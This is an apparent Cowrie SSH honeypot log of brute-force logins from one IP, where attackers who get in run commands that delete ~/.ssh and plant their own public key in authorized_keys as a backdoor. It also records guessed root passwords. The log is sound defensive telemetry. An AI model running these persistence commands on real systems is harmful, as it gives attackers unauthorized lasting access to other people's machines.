{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:00.234927Z","src_ip":"212.227.235.229","session":"8f6e1eb96846"}
{"eventid":"cowrie.login.failed","username":"sgp","password":"sgp@123","message":"login attempt [sgp/sgp@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:22:01.509789Z","src_ip":"212.227.235.229","session":"8f6e1eb96846"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:02.820731Z","src_ip":"212.227.235.229","session":"8f6e1eb96846"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59862,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9a990045d4","protocol":"ssh","message":"New connection: 212.227.235.229:59862 (1.2.3.4:22) [session: cf9a990045d4]","sensor":"my-vps","timestamp":"2025-09-08T22:22:09.355493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:09.356417Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:09.665581Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.login.success","username":"root","password":"fuckyou","message":"login attempt [root/fuckyou] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:10.944253Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:11.582644Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:11.583388Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:11.584552Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:11.894636Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:12.624449Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:22:12.625215Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:22:12.936190Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:12.937287Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59866,"dst_ip":"1.2.3.4","dst_port":22,"session":"13f8283b710d","protocol":"ssh","message":"New connection: 212.227.235.229:59866 (1.2.3.4:22) [session: 13f8283b710d]","sensor":"my-vps","timestamp":"2025-09-08T22:22:13.246739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:13.247500Z","src_ip":"212.227.235.229","session":"13f8283b710d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:13.558837Z","src_ip":"212.227.235.229","session":"13f8283b710d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:22:14.841505Z","src_ip":"212.227.235.229","session":"13f8283b710d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:16.154647Z","src_ip":"212.227.235.229","session":"13f8283b710d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59880,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8c208ab38c0","protocol":"ssh","message":"New connection: 212.227.235.229:59880 (1.2.3.4:22) [session: d8c208ab38c0]","sensor":"my-vps","timestamp":"2025-09-08T22:22:16.465174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:16.466069Z","src_ip":"212.227.235.229","session":"d8c208ab38c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:16.777382Z","src_ip":"212.227.235.229","session":"d8c208ab38c0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:18.060399Z","src_ip":"212.227.235.229","session":"d8c208ab38c0"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:18.371855Z","src_ip":"212.227.235.229","session":"cf9a990045d4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:18.372959Z","src_ip":"212.227.235.229","session":"d8c208ab38c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37780,"dst_ip":"1.2.3.4","dst_port":22,"session":"b869ede5beb8","protocol":"ssh","message":"New connection: 212.227.235.229:37780 (1.2.3.4:22) [session: b869ede5beb8]","sensor":"my-vps","timestamp":"2025-09-08T22:22:29.377346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:30.956628Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:30.957269Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39490,"dst_ip":"1.2.3.4","dst_port":22,"session":"14ea9962a59e","protocol":"ssh","message":"New connection: 212.227.235.229:39490 (1.2.3.4:22) [session: 14ea9962a59e]","sensor":"my-vps","timestamp":"2025-09-08T22:22:31.468854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:31.469487Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:31.758601Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.login.success","username":"root","password":"online@2024","message":"login attempt [root/online@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:32.674376Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd_1234","message":"login attempt [root/Abcd_1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:32.953672Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:33.210533Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.211338Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.212401Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34486,"dst_ip":"1.2.3.4","dst_port":22,"session":"357f3dca1030","protocol":"ssh","message":"New connection: 212.227.235.229:34486 (1.2.3.4:22) [session: 357f3dca1030]","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.267684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.297030Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.466755Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.498328Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:33.592190Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.592915Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.593746Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:33.883904Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:34.093032Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.093731Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.347146Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.348020Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe,./","message":"login attempt [root/123qwe,./] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.372909Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:34.481910Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
